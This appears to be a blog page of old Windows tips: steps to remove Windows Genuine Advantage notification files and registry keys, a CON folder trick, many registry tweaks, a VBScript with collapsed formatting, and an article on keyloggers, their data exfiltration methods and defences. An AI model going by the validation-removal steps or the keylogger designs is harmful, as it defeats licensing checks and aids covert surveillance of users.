Windows XP “you may be a victim of software counterfeiting”

After installing your genuine copy of Microsoft Windows XP you are prompted with a “Your software is counterfeit” error message at startup. Even after visiting the www.microsoft.com/genuine/ site and validating, you still get the above message popping up after 2 or 3 boots. There is an easy solution to this and I would like you to follow the steps below to fix the issue.

1. C:\Windows\Downloaded Program Files

• Within that folder, remove any files or folders associated with .WGA

2. Safe Mode

• Reboot your computer and as soon as Windows logs off, start repeatively tapping the F8 Key on your keyboard.
• As soon as you see the Windows Advanced Startup options select Safe Mode within Safe Mode get yourself into these folders…
• C:\Windows\System32 (Rename wgatray.exe to wgatrayold.exe)
• C:\Windows\System32\dllcache (Rename wgatray.exe to wgatrayold.exe)
  Note: Dllcache is a hidden folder, to view hidden folders do the following, go to Start, Control Panel, Folder Options,
  Select the view Tab and under the Hidden Files option, select Show hidden files and folders

3. Safe Mode Registry

• Click on Start, Run and within the open dialog box type regedit and click OK.
• Within the Registry Editor navigate your self to
  HKEY_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\WGALOGON
• Right Click and Export the WGALOGON Folder (this should be saved onto your machine for backup purposes)
• After Exporting the folder, DELETE the WGALOGON folder
• After deleting close all applications and Restart your machine back to Normal Mode

4. www.microsoft.com/genuine

• Get into the site above and manually re-validate your copy of Windows.
• After being prompt of a successful validation, Restart your Machine.

How to create CON folder

CON is a reserve world in windows operating system.
that's why we can not create the folder named as
CON.


But by command prompt we can do this

STEP1: goto command prompt
STEP2: type in prompt e:\> "mkdir \\.\e:\con"
STEP3: verify by typing "dir \\.\e:\con"
STEP4: delete the file or folder "rmdir \\.\e:\con"

ollowing file names in Windows are reserved because they represent devices:
con, con.* -> the console
prn, prn.* -> the default printer, as a character device
aux, aux.* -> the default serial terminal, as a character device
lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -> the parallel ports, as character devices
lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*
com1, com2, com3, com4, com5, com6, com7, com8, com9 -> the serial ports, as character devices
com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*
nul, nul.* -> the NUL or "waste bit bucket" or "black hole for bits" or "/dev/null" device

Such files are considered to "exist" in all directories, so if you have a filename like "c:\temp\con", you're talking about the CON device, not about a normal disk file called "con". They're not listed using the "dir" command, or using APIs.

COMPLETE REGISTRY TRICKS

Monday, June 9, 2008
COMPLETE REGISTRY TRICKS


Compiled and written by WINDOWS TEAM

If you enjoy these hacks, or have any other hacks you would like to send me, my email is windowsfun@gmail.com.

*Note: Not all of these hacks will work for Windows NT. Also, make sure you back up your reg files, user.dat and system.dat before modifying. Have fun. =)

Adding an Application to the Context Menu of Every Folder

1. HKEY_CLASSES_ROOT \ Folder \ shell

2. Add a key named "NameOfApplication" (without quotes) whether it be Notepad, Calculator,

etc.

3. Give it a default value of "NameOfApplication" This key can be named how you would like it to

appear on the context menu.

4. Placing a '&' symbol in front of a character will allow you to use that character on the keyboard.

(Characters that are underlined)

5. HKEY_CLASSES_ROOT \ Folder \ shell \ NameOfApplication

6. Add a key command

7. Give it a default value of the application you want to run. You must include the full path and file

name.

8. The context menu of any folder should now include a command to open your application.

Adding Items to the Context Menu of the Start Button

1. HKey_Classes_Root / Directory / Shell

2. Create a new key in the 'Shell' folder

3. Type in a name for the key, does not matter what you call it

4. Modify the data for 'Default' and give it a name of whatever you would like to appear on the

context menu.

5. Create another new key named "Command" (without the quotes) inside of the key you just

created in #2.

6. For the 'Default' value data of 'Command', enter the full path and program you want to execute.

7. Now when you right click on the Start Button, your new program will show up.

Automatically Refresh Explorer; Explorer Refresh Rate

Explorer doesn't always automatically refresh it's contents, you can modify the refresh rate of

Explorer.

1. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update

2. Modify the 'UpdateMode' value from 01 to 00.

Changing Exchange's Mailbox Location

When you create a mailbox in Exchange for e-mail, you specify the location where you want your

mail to go.

You cannot change this in Exchange afterwards.

1. HKEY_CURRENT_USER \ Software \ Microsoft \ WindowsMessaging Subsystem \ Profiles

2. Go to the profile you want to change

3. Go to the section that has the file location for your mailbox (*.PST) file in the right hand panel

4. Modify the data to the new file location

Changing the Registered Owner and Organization

1. HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion

2. Modify the data for the 'Registered Owner' key or for 'Registered Organization'

Changing the Tips of the Day

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \

explorer \ Tips

Changing the Location of Window's Installation Files

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Setup

\ SourcePath

2. Modify the string 'SourcePath' to the location and directory of your choice

Changing the MaxMTU and other Network Settings

There are four network settings that can be configured to affect your bandwidth when dialing an

ISP: MaxMTU, MaxMSS and DefaultRcvWindow, and DefaultTTL

MaxMTU and MaxMSS

1. Hkey_Local_Machine / System / CurrentControlset / Services / Class / netTrans / 000n

(where n is your particular network adapter binding)

2. Create a new string named "MaxMTU" (without the quotes)

3. Modify it's value to the number you want. Most people modify it to 576

4. You can also add a new string named "MaxMSS" and give it a value of 536

DefaultRcvWindows and DefaultTTL

1. HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ VxD \ MSTCP

2. Create a new string named "DefaultRcvWindow" (without the quotes) and modify it's value to

2144

3. Create a new string named "DefaultTTL" and modify it's value to 60-64

Changing the Telnet Scroll-Back Buffer Size

By default, the Telnet program has a window size of 25 lines. To increase the amount of lines you

can scroll back do the following.

1. HKEY_CURRENT_USER \ Software \ Microsoft \ Telnet

2. Modify the string 'Rows' to the desired value of your choice

Changing your Modem's Initialization String

1. HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Class \ Modem \ 0000

\ Init

2. Change the settings to the new values

Clearing the Documents Menu Automatically

The Documents Menu on your Start Menu displays recently opened files. You can have the

Registry clear the contents of this list every time Windows starts. Only do #1 if you are comfortable

with not being able to store files in your Recycle Bin. This mod tells Windows to store the shortcuts

it makes to recent documents in the Recycle Bin, thus deleting them.

1. Set the properties on the Recycle Bin to delete files immediately.

2. HKey_Current_User \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ User Shell

Folders

3. If there is no string named 'Recent', create a new string named "Recent"

4. Modify it's value to C:\RECYCLED

Compacting the Registry

1. Exit to DOS, **Not a DOS box**

2. Run the Registry Editor, yes run it in DOS, and then export the entire Registry to

COMPACT.REG.

3. Exit Regedit and run it again with the following switch. REGEDIT /C COMPACT.REG

Creating a Default File Opener

If you have a unregistered file type you wish to open up with Notepad, you can add Notepad to

the Context Menu of unregistered file types.

1. HKEY_CLASS_ROOT / Unknown / Shell

2. Create a new key named "Notepad" (without the quotes)

3. Create a new key under 'Notepad' named "Command" (without the quotes)

4. Modify the 'Default' value data for 'Command' to the path and filename of Notepad:

C:\WINDOWS\NOTEPAD.EXE %1

5. This modification will work with any program

Creating a Network Logon Banner

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \

Winlogon

2. Create a new String named "LegalNoticeCaption" (without the quotes)

3. Modify this string's value data to whatever you would like the text to be

Deleting Registry Keys from the Command Line

1. Exit to DOS, **Not a DOS box**

2. The syntax is: "REGEDIT /L:system.dat_location /R:user.dat_location /D Reg_Key" where

Reg_Key is the key you want to delete

Disable Password Caching

1. Create a new text document named "Disable.REG" (without the quotes)

2. Edit this new document in Notepad or any ASCII text editor and insert the following text:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\

Network]

"DisablePwdCaching"=dword:00000001

3. Either double-click on this new file in Explorer and merge it into the Registry, or you can open

up a DOS box and type REGEDIT DISABLE.REG

Disabling Drives in My Computer

This modification will remove all drives, local and network, from Explorer's view.

1. HKey_Current_User \ Software \ Microsoft \ Windows \ Current Version \ Policies \ Explorer

2. Create a DWORD item and name it "NoDrives" (without the quotes)

3. Modify it's value to "3FFFFFF"

Disabling Run and Find from the Start Menu

This modification will remove the Run or Find option on the Start Menu.

1. HKey_Current_User \ Software\ Microsoft \Windows \ Current Version \ Policies \ Explorer

2. Create a new DWORD item and name it either "NoFile" or "NoRun" (without the quotes)

3. Modify it's value to "1"

Disabling File and Print Sharing

This modification will deny network access to local printers or shared files.

1. HKey_Local_Machine \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Network

2. Create a new DWORD Value and name it either "NoPrintSharing" or "NoFileSharing"

3. Modify it's value to "1"

Disabling My Computer from the Desktop

This modification is good for administration of multiple users to prevent access to drives, the

Control Panel, etc. After completing this modification, clicking on My Computer will do nothing.

You may want to export this section if you wish to restore it later.

1. Search for "20D04FE0-3AEA-1069-A2D8-08002B30309D" (without the quotes)

2. This should be the HKey_Classes_Root \ CLSID section

3. Delete the entire section. Yes, you read right.

Disabling the Right-Click on the Start Button

This modification is good for administration of multiple users. After completing this modification,

right-clicking the Start button will do nothing. This also disables use of the Windows key in

conjunction with the E (Explorer) and F (Find) keys on some newer keyboards. You may want to

export these two sections if you wish to restore them later.

1. HKey_Classes_Root \ Directory \ Shell

2. Expand section 'Shell' so that you see the folder 'Find'

3. Delete 'Find' along with all of it's contents

4. HKey_Classes_Root \ Folder

5. Expand section 'Folder'

6. Delete 'Explore' and 'Open' along with all of their contents

Displaying Hi-Color Icons without the Plus Pack

1. HKEY_CURRENT_USER \ Control Panel \ desktop \ WindowMetrics

2. Create or edit the string 'Shell Icon BPP'

3. Modify it's value data to a number representing the color depth you wish. This number is in bits,

not colors. BPP stands for Bits Per Pixel

4. The default is 8-bit (256 colors)

Easily Opening any File with Notepad (Context Menu)

This modification will enable the context menu with the option to open the file with Notepad.

1. HKEY_CLASSES_ROOT \ *

2. Create a new key under '*' named "Shell" (without the quotes)

3. Create a new key under 'Shell' named "Open" (without the quotes)

4. Modify the string 'Default' inside of 'Open' to whatever you would like to appear on the context

menu. I.E. "Open With Notepad" (without the quotes)

5. Create a new key under 'Open' named "Command" (without the quotes)

6. Modify the string 'Default' inside of 'Command' to "C:\WINDOWS\NOTEPAD.EXE %1"

(without the quotes)

Enable Explorer Thumbnails of Bitmaps

This modification will allow Explorer to show thumbnails of bitmap files (*.bmp) as icons.

1. HKey_Classes_Root \ Paint.Picture \ DefaultIcon

2. Edit the string named 'Default' to value data of "%1" (without the quotes)

Fixing a Corrupt Registry

If your registry has become corrupted, and re-installing Windows over your existing installation

does not fix the problem,

there is a hidden, read-only, system file on the root of your boot drive called SYSTEM.1ST.

This is the initial system registry created when you first installed Windows. To use this file:

1. In DOS, go to your Windows directory.

2. Strip the attributes of your current SYSTEM.DAT with the following syntax: ATTRIB -r -s -h

SYSTEM.DAT

3. Copy C:\WINDOWS\SYSTEM.DAT to SYSTEM.BAD as a backup

4. Switch down to the root directory of the drive Windows is installed on.

5. Strip the attributes of SYSTEM.1ST with the following syntax: ATTRIB -r -s -h SYSTEM.1ST

6. Copy SYSTEM.1ST to C:\WINDOWS\SYSTEM.DAT

This is a last minute fix for the Registry. It will not restore any information about your 32-bit apps

thus you will need to reinstall them or any other programs that modified your system registry. 16-bit

apps do not modify the registry so, those should be able to remain in place. To avoid this problem,

you need to backup your registry on a regular basis!

Get Your Folders to Open the Way You Want Every Time

1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

2. Modify the string 'NoSaveSettings' to a value of 1

Getting Rid of Schemes

1. Open up Display Control Panel.

2. Switch to the Appearance tab.

3. Determine which schemes you wish to delete.

4. If you wish to delete them all, you should create one as a backup.

5. HKEY_CURRENT_USER \ Control Panel \ Appearance \ Schemes

6. Right-click each sheme you wish to delete and click delete. DO NOT DELETE "Default"

Getting Rid of or Editing Startup Tips

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \

explorer \ Tips

2. You can edit or delete the tips of your choice

Increasing the Modem Timeout

1. HKEY_LOCAL_MACHINE / System / CurrentControlSet / Services / Class / Modem /

XXXX / Settings (XXXX = number of your modem)

2. Modify the string 'Inactivity Timeout' to the number of minutes you wish for the modem to wait

on file transfers before timing out.

Internet Explorer's Bitmap Toolbar Background; How to Change it

1. HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Toolbar

2. Modify the string 'BackBitmap' to contain the path and filename of the bitmap you wish to use

(must be a bmp)

3. If this string does not exsist, create one.

Modifying Default Desktop Icons

This can be done to many if not all of your default desktop icons

My Computer Icon

1. Search the registry for "My Computer" or "20D04FE0-3AEA-1069-A2D8-08002B30309D"

(without the quotes)

2. Modify the string 'Default Icon' to contain the path, filename containing the icon you want to use

followed by the icon number (starts at 0)

The above steps should also work for:

Network Neighborhood - HKEY_CLASSES_ROOT\

CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}

InBox - HKEY_CLASSES_ROOT\ CLSID\{00020D75-0000-0000-C000-000000000046}

Recycle Bin - HKEY_CLASSES_ROOT\

CLSID\{645FF040-5081-101B-9F08-00AA002F954E}

Additional icons can be found in:

WINDOWS\MORICONS.DLL

WINDOWS\SYSTEM\PIFMGR.DLL

WINDOWS\SYSTEM\SHELL32.DLL

Modifying Icon Cache Size

The default cache size for icons is set at 512, so when the number of icons exceeds this number, it

uses the page file for storage.

1. HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Explorer

2. Create a new string named "MaxCacheIcons"

3. Modify this string to contain a value that suits your needs. I've heard of 4000 being used, I don't

think my computer encounters that many icons in one session!

Not Displaying the Network Neighborhood

1. HKEY_CURRENT_USER / Software / Microsoft /Windows / Current Version / Policies /

Explorer

2. Create a new DWORD named "NoNetHood" (without the quotes)

3. Modify this new DWORD to a value of 1

Not Saving Settings on Exit

1. HKEY_CURRENT_USER / Software / Microsoft / Windows / Current Version / Policies /

Explorer

2. Create a new DWORD named "NoSaveSettings" (without the quotes)

3. Modify this new DWORD to a value of 1

Opening Explorer from My Computer

By default, double-clicking 'My Computer' gives you a window containing your drives, control

panel, etc. If you would rather have Explorer open when you double-click 'My Computer' do the

following:

1. Search for "My Computer" or "20D04FE0-3AEA-1069-A2D8-08002B30309D" (without the

quotes)

2. This should bring you to HKEY_CLASSES_ROOT / CLSID

3. Expand the key {20D04FE0-3AEA-1069-A2D8-08002B30309D}

4. Create a new key under the 'Shell' key and name it "Open"

5. Create a new key under 'Open' named "Command"

6. Modify the 'Default' string under command and give it a value of "Explorer.exe" (without the

quotes)

7. If you wish to undo this change, delete the 'Open' key and all of it's contents

Recycle Bin Edits

Modify the context menu of the Recycle Bin

HKEY_CLASSES_ROOT \ CLSID \ {645FF040-5081-101B-9F08-00AA002F954E} \

ShellFolder

Bin Value: "Attributes"=hex:50,01,00,20 ... adds 'Rename' to the menu

Bin Value: "Attributes"=hex:60,01,00,20 ... adds 'Delete' to the menu

Bin Value: "Attributes"=hex:70,01,00,20 ... adds 'Rename' and 'Delete' to the menu

Bin Value: "Attributes"=hex:40,01,01,20 ... standard shortcut arrow

Bin Value: "Attributes"=hex:40,01,02,20 ... another shortcut arrow

Bin Value: "Attributes"=hex:40,01,04,20 ... and another shortcut arrow

Bin Value: "Attributes"=hex:40,01,08,20 ... make it look disabled or cut

Bin Value: "Attributes"=hex:41,01,00,20 ... copy

Bin Value: "Attributes"=hex:42,01,00,20 ... cut

Bin Value: "Attributes"=hex:43,01,00,20 ... copy cut

Bin Value: "Attributes"=hex:44,01,00,20 ... paste

Bin Value: "Attributes"=hex:45,01,00,20 ... copy paste

Bin Value: "Attributes"=hex:46,01,00,20 ... cut paste

Bin Value: "Attributes"=hex:47,01,00,20 ... copy cut paste

Removing Items from NEW on the Desktop Context Meun

1. Search for the string 'ShellNew'

2. This should bring you to HKEY_CLASSES_ROOT

3. For the items you want to remove, simply rename the 'ShellNew' command as renaming it is

safer than deleting

4. Continue searching for the items you want to remove

5. Be sure they all fall under HKEY_CLASSES_ROOT

Removing Open, Explore & Find from Start Button

1. HKEY_CLASSES_ROOT \ Directory \ Shell

2. Delete the key 'Find'

3. HKEY_CLASSES_ROOT \ Folder \ Shell

4. Delete the keys 'Explore' and 'Open'

Note: - When you remove Open, you cannot open any folders

Removing Programs listed from the Control Panel's Add/Remove Programs

Section

If you delete an installed program and its files, it may or may not remain in the 'Add/Remove

Programs' Control Panel. In order to remove such programs from the list, do the following:

1. HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion /

Uninstall

2. Delete the keys or strings for programs you do not want to appear in the list

3. This will only delete them from the list, it will not delete the actual programs.

Removing Sound Events from the Sounds Control Panel

This modification will delete actual events such as 'Asterick' or 'Critical Stop' This does not

unassign any sounds related to events.

1. HKEY_CURRENT_USER / AppEvents / Schemes / Apps

2. From here you can delete any items you don't want to show or no longer need

Removing the Shortcut Arrows

1. HKEY_CLASSES_ROOT / LNKFILE

2. Delete the string 'IsShortcut'

3. HKEY_CLASSES_ROOT / PIFFILE

4. Delete the value IsShortcut

Removing Unwanted Items from the RUN Menu

1. Search the registry for the word 'RUNMRU'

2. Delete the strings you don't want

3. Rename all of the strings so they are all in alphabetical order

User Restrictions without running Poledit

You can create user restrictions by modifying the Registry directly and not using the Policy Editor

(poledit.exe).

1. HKEY_Current_User / Software / Microsoft / CurrentVersion / Policies

2. There should already be at least an 'Explorer ' key

3. Additional keys that can be created under Policies are 'System', 'Network 'and 'WinOldApp'

4. The below list explains what restrictions can be done under the keys, Explorer, System,

Network, and WinOldApp.

5. They are all DWORDs and consist of a value of '1'

Explorer:

NoDeletePrinter - Disables Deletion of Printers

NoAddPrinter - Disables Addition of Printers

NoRun - Disables Run Command

NoSetFolders - Removes Folders from Settings on Start Menu

NoSetTaskbar - Removes Taskbar from Settings on Start Menu

NoFind - Removes the Find Command

NoDrives - Hides Drives in My Computers

NoNetHood - Hides the Network Neighborhood

NoDesktop - Hides all items on the Desktop

NoClose - Disables Shutdown

NoSaveSettings - Don't save settings on exit

DisableRegistryTools - Disable Registry Editing Tools - NOTE: Be Careful of this one

NoRecentDocsHistory - Removes Recent Document from Start Menu

ClearRecentDocsOnExit - Clears the Recent Documents when you Exit

NoInternetIcon - Removes the Internet Icon from the Desktop

System:

NoDispCPL - Disable Display Control Panel

NoDispBackgroundPage - Hide Background Page

NoDispScrSavPage - Hide Screen Saver Page

NoDispAppearancePage - Hide Appearance Page

NoDispSettingsPage - Hide Settings Page

NoSecCPL - Disable Password Control Panel

NoPwdPage - Hide Password Change Page

NoAdminPage - Hide Remote Administration Page

NoProfilePage - Hide User Profiles Page

NoDevMgrPage - Hide Device Manager Page

NoConfigPage - Hide Hardware Profiles Page

NoFileSysPage - Hide File System Button

NoVirtMemPage - Hide Virtual Memory Button

Network:

NoNetSetupSecurityPage - H

NoNetSetup - Disable the Network Control Panel

NoNetSetupIDPage - Hide Identification Page

NoNetSetupSecurityPage - Hide Access Control Page

NoFileSharingControl - Disable File Sharing Controls

NoPrintSharing - Disable Print Sharing Controls

WinOldApp:

Disabled - Disable MS-DOS Prompt

NoRealMode - Disables Single-Mode MS-DOS

Saving Desktop Settings

This explains how to tell Windows to remember such arguements as window size, position, icon

arrangement, etc.

1. HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \

Explorer

2. Delete the "NoSaveSettings" string.

3. HKEY_USERS \ QWERT \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \

Explorer

4. Where QWERT is your password profile

Setting the Minimum Password Length

1. HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \

Network

2. Create a new Bin Value named "MinPwdLen" (without the quotes)

3. Assign it a value you wish to be the minimum password length as a number of how many

characters

Specifying programs to run every time Windows

We all know that you can place shortcuts to programs in the Startup folder of your Start Menu in

order to have that program start on Windows load. Or place a run=path/filename or

load=path/filename line in your win.ini. However, you may wish for users to not be able to change

whether these programs run or not. Unless they are advanced users you can hide these programs

from them by placing command in the Registry to run the programs on Windows load.

1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run

OR HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce

OR HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \

RunServices

2. Create a new string and name it whatever you like.

3. Edit the new string's value to contain the path and filename of the program or registered file type

you wish to load at Windows startup.

Stuck Program Timeout Value

This modification can be helpful if you are running unstable programs or an unstable machine. This

modification changes the amount of time Windows waits before considering a program 'Not

Responding'

1. HKEY_CURRENT_USER / Control Panel / Desktop

2. Create a new string named 'HungUpTimeOut' (without the quotes)

3. Modify the new string's value to 1-10000

4. This value is in miliseconds

To speed up the Start Menu

1. Search the registry for the word desktop

2. This should bring you to HKEY_CLASSES_ROOT / CLSID / {00021400...

3. Create a new string named "MenuShowDelay" (without the quotes)

4. Edit the new string to a value from 1-10, where 1 is the fastest

Turn Off Window Animation

You can turn off the animation displayed when you minimize and maximize windows with this

modification.

1. HKEY_CURRENT_USER \ Control panel \ Desktop \ WindowMetrics

2. Create a new string named "MinAnimate"

3. Modify the new string's value for 0 or 1

4. 0 = Off and 1 = On

Wait to Kill Frozen Program Value

This modification changes the amount of time Windows will wait before force quitting an

application, rather it is 'Not Responding' or not, after telling Windows to 'End Task' in the

CTRL+ALT+DEL dialog box.

1. HKEY_CURRENT_USER \ Control Panel \ Desktop

2. Create a new string named "WaitToKillAppTimeout" (without the quotes)

3. Modify the new string to a value 1-20000

4. This value is in miliseconds

Enable/Disable Registry Editing tools

'Enable/Disable Registry Editing tools'© Joji - rev 12/06/99
Option Explicit
'Declare variablesDim WSHShell, n, MyBox, p, t, mustboot, errnum, versDim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"p = p & "DisableRegistryTools"itemtype = "REG_DWORD"mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"enab = "ENABLED"disab = "DISABLED"jobfunc = "Registry Editing Tools are now "
'This section tries to read the registry key value. If not present an'error is generated. Normal error return should be 0 if value is'presentt = "Confirmation"Err.ClearOn Error Resume Nextn = WSHShell.RegRead (p)On Error Goto 0errnum = Err.Number
if errnum <> 0 then'Create the registry key value for DisableRegistryTools with value 0WSHShell.RegWrite p, 0, itemtypeEnd If
'If the key is present, or was created, it is toggled'Confirmations can be disabled by commenting out'the two MyBox lines below
If n = 0 Thenn = 1WSHShell.RegWrite p, n, itemtypeMybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)ElseIf n = 1 thenn = 0WSHShell.RegWrite p, n, itemtypeMybox = MsgBox(jobfunc & enab & vbCR & mustboot, 4096, t)End If



Create the Notepad.txtCopy & Paste this content in Notepad and save it .vbs extension.(Notepad.vbs)Then double-click on it.One Message will appears...If your regedit enable it will going to disable.......If your regedit disable it will going to enable.......

Keystroke logging

Keystroke logging (often called keylogging) is a method of capturing and recording user keystrokes. The technique and name came from before the era of the graphical user interface; loggers nowadays would expect to capture mouse operations too. Keylogging can be useful to determine sources of errors in computer systems, to study how users interact and access with systems, and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for both law enforcement and law-breaking—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. Keyloggers are widely available on the Internet.

There are currently two types of keylogging methods, hardware and software based.

Application

Keystroke logging can be achieved by both hardware and software means. Hardware key loggers are commercially available devices which come in three types: inline devices that are attached to the keyboard cable, devices which can be installed inside standard keyboards, and actual replacement keyboards that contain the key logger already built-in. The inline devices have the advantage of being able to be installed instantly on desktop computers without integrated keyboards.

When used covertly, inline devices are easily detected by a glance at the keyboard connector plugged into the computer. Of the three types, the most difficult to install is also the most difficult to detect. The device that installs inside a keyboard (presumably the keyboard the target has been using all along) requires soldering skill and extended access to the keyboard to be modified. However, once in place, this type of device is virtually undetectable unless specifically looked for.

[edit] Types of keystroke loggers

1) Local Machine software Keyloggers are software programs that are designed to work on the target computer’s operating system. From a technical perspective there are four categories:

• Hypervisor-based: The keylogger resides in a malware hypervisor running underneath the operating system, which remains untouched, except that it effectively becomes a virtual machine. See Blue Pill for a conceptual example.
• Kernel based: This method is difficult both to write and to combat. Such keyloggers reside at the kernel level and are thus difficult to detect, especially for user-mode applications. They are frequently implemented as rootkits that subvert the operating system kernel and gain unauthorized access to the hardware which makes them very powerful. A keylogger using this method can act as a keyboard driver for example, and thus gain access to any information typed on the keyboard as it goes to the operating system.
• Hook based: Such keyloggers hook the keyboard with functions provided by the operating system. The operating system warns them any time a key is pressed and it records it.
• Passive Methods: Here the coder uses operating system APIs like GetAsyncKeyState(), GetForegroundWindow(), etc. to poll the state of the keyboard or to subscribe to keyboard events. These are the easiest to write, but where constant polling of each key is required, they can cause a noticeable increase in CPU usage and can miss the occasional key. A more recent example simply polls the BIOS for preboot authentication PINs that have not been cleared from memory.^[1]
• Form Grabber based logs web form submissions by recording the web browsing .onsubmit event functions. This records form data before it is passed over the internet and bypasses https encryption.

2) Remote Access software Keyloggers are local software keyloggers programmed with an added feature to transmit recorded data out of the target computer and make the data available to the monitor at a remote location. Remote communication is facilitated by one of four methods:

• Data is uploaded to a website or an ftp account.
• Data is periodically emailed to a pre-defined email address.
• Data is wirelessly transmitted by means of an attached hardware system.
• It allows the monitor to log into the local machine via the internet or ethernet and access the logs stored on the target machine.

It has been suggested that Hardware keylogger be merged into this article or section. (Discuss)

3) Hardware Keyloggers are used for keystroke logging by means of a hardware circuit that is attached somewhere in between the computer keyboard and the computer. It logs all keyboard activity to its internal memory, which can subsequently be accessed, for example, by typing in a secret key. A hardware keylogger has an advantage over a software solution; because it is not dependent on the computer's operating system, it will not interfere with any program running on the target machine and hence cannot be detected by any software, however its physical presence may be detected.

4) Remote Access Hardware Keyloggers, otherwise known as Wireless Hardware Keyloggers, work in much the same way as regular hardware keyloggers, except they have the ability to be controlled and monitored remotely by means of a wireless communication standard.

5) Wireless Keylogger sniffers collect packets of data being transferred from a wireless keyboard and its receiver and then attempts to crack the encryption key being used to secure wireless communications between the two devices.

6) Acoustic Keyloggers work by analysing a recording of the sound created by someone typing on a computer. Each character on the keyboard makes a subtly different acoustic signature when stroked. Using statistical methods, it is then possible to identify which keystroke signature relates to which keyboard character. This is done by analysing the repetition frequency of similar acoustic keystroke signatures, the timings between different keyboard strokes and other context information such as the probable language in which the user is writing. A fairly long recording (1000 or more keystrokes) is required so that the statistics are meaningful.

7) Electromagnetic Radiation loggers work by passively capturing electromagnetic emissions of a keyboard, without being physically wired to it.^[2]

[edit] Cracking

Writing software applications for keylogging is trivial, and like any computer program can be distributed as a trojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

[edit] Trojan

Young and Yung devised several methods for solving this problem and presented them in their 1997 IEEE Security & Privacy paper^[3] (their paper from '96 touches on it as well). They presented a deniable password snatching attack in which the keystroke logging trojan is installed using a virus (or worm). An attacker that is caught with the virus or worm can claim to be a victim. The cryptotrojan asymmetrically encrypts the pilfered login/password pairs using the public key of the trojan author and covertly broadcasts the resulting ciphertext. They mentioned that the ciphertext can be steganographically encoded and posted to a public bulletin board (e.g. Usenet).

[edit] Ciphertext

Young and Yung also mentioned having the cryptotrojan unconditionally write the asymmetric ciphertexts to the last few unused sectors of every writable disk that is inserted into the machine. The sectors remain marked as unused. This can be done using a USB token. So, the trojan author may be one of dozens or even thousands of people that are given the stolen information. Only the trojan author can decrypt the ciphertext because only the author knows the needed private decryption key. This attack is from the field known as cryptovirology.

[edit] Federal Bureau of Investigation

The FBI used a keystroke logger to obtain the PGP passphrase of Nicodemo Scarfo, Jr., son of mob boss Nicodemo Scarfo. Scarfo Jr. pleaded guilty to running an illegal gambling operation in 2002.^[4] The FBI has also reportedly developed a trojan-horse-delivered keylogger program known as Magic Lantern.^[5]

[edit] Use in surveillance software

Some surveillance software has keystroke logging abilities and is advertised to monitor the internet use of minors. Such software has been criticized on privacy grounds, and because it can be used maliciously or to gain unauthorized access to users' computer systems.

[edit] Keylogger prevention

Currently there is no easy way to prevent keylogging. In the future, it is believed^[who?] that software with secure I/O will be protected from keyloggers. Until then, however, the best strategy is to use common sense and a combination of several methods. It is possible to use software to monitor the connectivity of the keyboard and log the absence as a countermeasure against physical keyloggers. For a PS/2 keyboard, the timeout bit (BIT6 at port 100) has to be monitored. ^[6] But this only makes sense when the PC is (nearly) always on.

[edit] Code signing

64-bit versions of Windows Vista and Server 2008 implement mandatory digital signing of kernel-mode device drivers^[7], thereby restricting the installation of key-logging rootkits.

[edit] Monitoring what programs are running

A user should constantly observe what programs are installed and running on his or her machine. Also, devices connected to PS/2 and USB ports (which can both be hacked) can be used to secretly install a keylogger and then remove it (along with the user's data) by the perpetrator.

[edit] Anti-spyware

Anti-spyware applications are able to detect many keyloggers and cleanse them. Responsible vendors of monitoring software support detection by anti-spyware programs, thus preventing abuse of the software.

[edit] Firewall

Enabling a firewall does not stop keyloggers per se, but can possibly prevent transmission of the logged material over the net if properly configured.

[edit] Network monitors

Network monitors (also known as reverse-firewalls) can be used to alert the user whenever an application attempts to make a network connection. This gives the user the chance to prevent the keylogger from "phoning home" with his or her typed information.

[edit] Automatic form filler programs

